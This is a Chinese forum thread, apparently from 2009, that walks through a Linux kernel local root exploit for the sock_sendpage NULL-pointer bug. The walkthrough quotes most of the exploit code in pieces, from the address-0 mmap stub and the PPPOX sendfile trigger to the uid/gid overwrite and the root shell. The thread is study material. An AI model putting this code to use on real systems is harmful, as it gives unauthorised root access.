新爆內(nèi)核高危漏洞sock_sendpage的利用分析的討論

獨孤九賤

先發(fā)點上磚上來引玉，大家一起討論一下吧。

http://linux.chinaunix.net/bbs/thread-1130262-1-1.html

詳細地描述了這個漏洞。

具體漏洞原因在

http://archives.neohapsis.com/ar ... e/2009-08/0174.html

也有描述。


因為sock_sendpage沒有做指針檢查，有些模塊不具備sendpage功能，初始時賦為NULL，這樣，沒有做檢查的sock_sendpage有可能直接調(diào)用空指針而導致出錯——重新映射地址0，并提升權(quán)限�。。�！

1. ssize_t sock_sendpage(struct file *file, struct page *page,
   
2.                       int offset, size_t size, loff_t *ppos, int more)
   
3. {
   
4.         struct socket *sock;
   
5.         int flags;
   
6. 
   
7.         sock = SOCKET_I(file->f_dentry->d_inode);
   
8. 
   
9.         flags = !(file->f_flags & O_NONBLOCK) ? 0 : MSG_DONTWAIT;
   
10.         if (more)
    
11.                 flags |= MSG_MORE;
    
12. 
    
13. /*
    
14.         沒有做類似的指針檢查，就直接調(diào)用
    
15. 
    
16.            if (unlikely(!sock->ops->sendpage))   
    
17.                 return -EINVAL;
    
18. 
    
19. */
    
20. 
    
21.         return sock->ops->sendpage(sock, page, offset, size, flags);
    
22. }

復制代碼

來看看利用的代碼（程序是在安焦上面下載的:
http://www.securityfocus.com/dat ... xploits/36038-4.tgz）：

1. int main(void) {
   
2. char template[] = "/tmp/padlina.XXXXXX";
   
3. int fdin, fdout;
   
4. void *page;
   
5. 
   
6. //獲取當前程序的uid和gid，后面權(quán)限提升的時候查找使用
   
7. uid = getuid();
   
8. gid = getgid();
   
9. setresuid(uid, uid, uid);
   
10. setresgid(gid, gid, gid);
    
11. 
    
12. if ((personality(0xffffffff)) != PER_SVR4) {
    
13.   if ((page = mmap(0x0, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS, 0, 0)) == MAP_FAILED) {
    
14.    perror("mmap");
    
15.    return -1;
    
16.   }
    
17. } else {
    
18.   if (mprotect(0x0, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC) < 0) {
    
19.    perror("mprotect");
    
20.    return -1;
    
21.   }

復制代碼

程序mmap了地址0x0，接下來

1. *(char *)0 = '\x90';  (nop)
   
2. *(char *)1 = '\xe9';  (jmp)
   
3. *(unsigned long *)2 = (unsigned long)&kernel_code - 6;

復制代碼

（這個 - 6是什么意思，大家指點一下）
在地址0x0處埋下代碼kernel_code 函數(shù)，因為0x90 = nop, 0xe9 = jmp
上面代碼可表示為在映射的地址0處，執(zhí)行

1. nop
   
2. jmp kernel_code

復制代碼

不過現(xiàn)在還沒有執(zhí)行，因為Bug沒有被激活，程序沒有運行到地址0處。

然后就是激活該Bug：

1. if ((fdin = mkstemp(template)) < 0) {
   
2.   perror("mkstemp");
   
3.   return -1;
   
4. }
   
5. 
   
6. if ((fdout = socket(PF_PPPOX, SOCK_DGRAM, 0)) < 0) {
   
7.   perror("socket");
   
8.   return -1;
   
9. }
   
10. 
    
11. unlink(template);
    
12. ftruncate(fdin, PAGE_SIZE);
    
13. sendfile(fdout, fdin, NULL, PAGE_SIZE);

復制代碼

這段代碼是漏洞描述上的示例代碼。。。。。。

關鍵是kernel_code：

因為Bug被激活，進程已經(jīng)進入內(nèi)核上下文：

1. void kernel_code()
   
2. {
   
3. int i;
   
4. uint *p = get_current();

復制代碼

kernel_code第一步是獲取當前進程的進程描述符，get_current是一個內(nèi)聯(lián)匯編：

1. static inline __attribute__((always_inline)) void *get_current()
   
2. {
   
3. unsigned long curr;
   
4. __asm__ __volatile__ (
   
5.   "movl %%esp, %%eax ;"
   
6.   "andl %1, %%eax ;"
   
7.   "movl (%%eax), %0"
   
8.   : "=r" (curr)
   
9.   : "i" (~8191)
   
10. );
    
11. return (void *) curr;
    
12. }

復制代碼

這段代碼是現(xiàn)成的，描述進程描述符的資料，例如《ULK3》或《Linux內(nèi)核設計與實現(xiàn)》上都有其介紹。內(nèi)核中的原型是:

1. static inline struct task_struct * get_current(void)
   
2. {
   
3.         return current_thread_info()->task;
   
4. }
   
5. 
   
6. /* how to get the thread information struct from C */
   
7. static inline struct thread_info *current_thread_info(void)
   
8. {
   
9.         struct thread_info *ti;
   
10.         __asm__("andl %%esp,%0; ":"=r" (ti) : "0" (~(THREAD_SIZE - 1)));
    
11.         return ti;
    
12. }

復制代碼

include/asm-i386/current.h

程序返回的是一個uint *指針,而不是struct task_struct *，我認為有兩個理由：
A、這是在應用態(tài)而不是內(nèi)核態(tài)，如果使用后者，會比較麻煩；
B、這個程序是超版本的，也就是不僅限于某個內(nèi)核版本，所以，struct task_struct的結(jié)構(gòu)可能會有很大的變化。

所以，沒有辦法，只能在整個結(jié)構(gòu)范圍之內(nèi)來查找uid和gid。以我的2.6.12為例：
struct task_struct {
……
           /* process credentials */
        uid_t uid,euid,suid,fsuid;
        gid_t gid,egid,sgid,fsgid;
……
}
就是要逐個找到它們，一共是8個字段：
所以，使用uint*指針來指向結(jié)構(gòu)的整個buffer，就可以逐字節(jié)的查找。而不是直接使用成員名。（我不知所有歷史版本，這些成員的名稱是否會變化，這樣做不引用成員名，連成員名變化都可以忽略了。）

1. for (i = 0; i < 1024-13; i++) {
   
2.   if (p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid && p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid) {
   
3.     p[0] = p[1] = p[2] = p[3] = 0;
   
4.    p[4] = p[5] = p[6] = p[7] = 0;
   
5.    p = (uint *) ((char *)(p + 8) + sizeof(void *));
   
6.    p[0] = p[1] = p[2] = ~0;
   
7.    break;
   
8.   }
   
9.   p++;
   
10. }

復制代碼

所以這里要做一個循環(huán)，就是為了超版本的在整個結(jié)構(gòu)的數(shù)據(jù)中逐個搜尋，去匹備那8個成員。查找上限是1024 - 13，應該與struct task_struct結(jié)構(gòu)的大小有關。包子TX貼子中說測試程序可能會引起系統(tǒng)出問題，估計就是出在這里了。（猜測，呵呵）

接下來就是查找到進程的uid和gid，然后替換之，這里設為0，即為root！！！以達到提升權(quán)限的目的。

exit_kernel();退出內(nèi)核態(tài)，并調(diào)用exit_code()函數(shù)，運行shell。

1. static inline __attribute__((always_inline)) void exit_kernel()
   
2. {
   
3. __asm__ __volatile__ (
   
4.   "movl %0, 0x10(%%esp) ;"
   
5.   "movl %1, 0x0c(%%esp) ;"
   
6.   "movl %2, 0x08(%%esp) ;"
   
7.   "movl %3, 0x04(%%esp) ;"
   
8.   "movl %4, 0x00(%%esp) ;"
   
9.   "iret"
   
10.   : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
    
11.       "i" (USER_CS), "r" (exit_code)
    
12.      );
    
13. }

復制代碼

1. void exit_code()
   
2. {
   
3. if (getuid() != 0) {
   
4.   fprintf(stderr, "failed\n");
   
5.   exit(-1);
   
6. }
   
7. 
   
8. execl("/bin/sh", "sh", "-i", NULL);
   
9. }

復制代碼

這些利用漏洞的人，太強了，PF呀PF，人與人差距太大了，學無止境呀�。�！

[ 本帖最后由 獨孤九賤 于 2009-8-18 22:52 編輯 ]

Godbach

九賤兄也很強啊。小弟們很是佩服。。

platinum

感覺九賤兄的學習能力和自我鉆研能力超強，而且還經(jīng)常很無私的將一些成果與大家分享
非常敬仰！

goter

好！

獨孤九賤

原帖由 platinum 于 2009-8-18 17:55 發(fā)表
感覺九賤兄的學習能力和自我鉆研能力超強，而且還經(jīng)常很無私的將一些成果與大家分享
非常敬仰！

大家莫要這樣說呀,我也是自己看懂一些,請教別人一些,還有一些不是完全懂.放上來大家討論學習一下,我也好學透!!!再在回來翻了一個ULK3,發(fā)現(xiàn)有地方理解有誤,再看看,回頭再修改一下.

[ 本帖最后由 獨孤九賤 于 2009-8-18 22:08 編輯 ]

Godbach

九賤兄為學和為人的態(tài)度都值得我們學習。

獨孤九賤

對于Linux這種溢出技術(shù)基本上都很成熟了。那兩個內(nèi)聯(lián)匯編函數(shù)在以前的溢出程序中也是頻率出現(xiàn)�；�本上就是往上套。
比如:
http://www.7747.net/Soft/200908/15070.html
演示vmsplice溢出代碼,可以對比參考學習一下.

我覺得作者漂亮的代碼是：
mmap(0x0, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS, 0, 0)
*(char *)0 = '\x90';  (nop)
*(char *)1 = '\xe9';  (jmp)
*(unsigned long *)2 = (unsigned long)&kernel_code - 6;

也不知是不是他原創(chuàng)的,不過偶以前的確沒有見過，孤陋寡聞了�，F(xiàn)在學習了，呵呵�。�！

[ 本帖最后由 獨孤九賤 于 2009-8-18 23:32 編輯 ]

Godbach

直接往0地址空間賦值了

emmoblin

我有有點不解，想請教一下：
return sock->ops->sendpage(sock, page, offset, size, flags);
沒做檢測就直接調(diào)用了。這時會跳到進程的虛擬地址0的位置執(zhí)行。

但是我不理解的是：之前他做了一個mmap，這時向0地址寫入代碼，不會有什么任何問題嗎？
不會破壞系統(tǒng)或者進程嗎？

emmoblin

mmap這里我覺得很神奇，相當于讓內(nèi)核執(zhí)行了用戶進程空間的代碼。
這樣太危險了。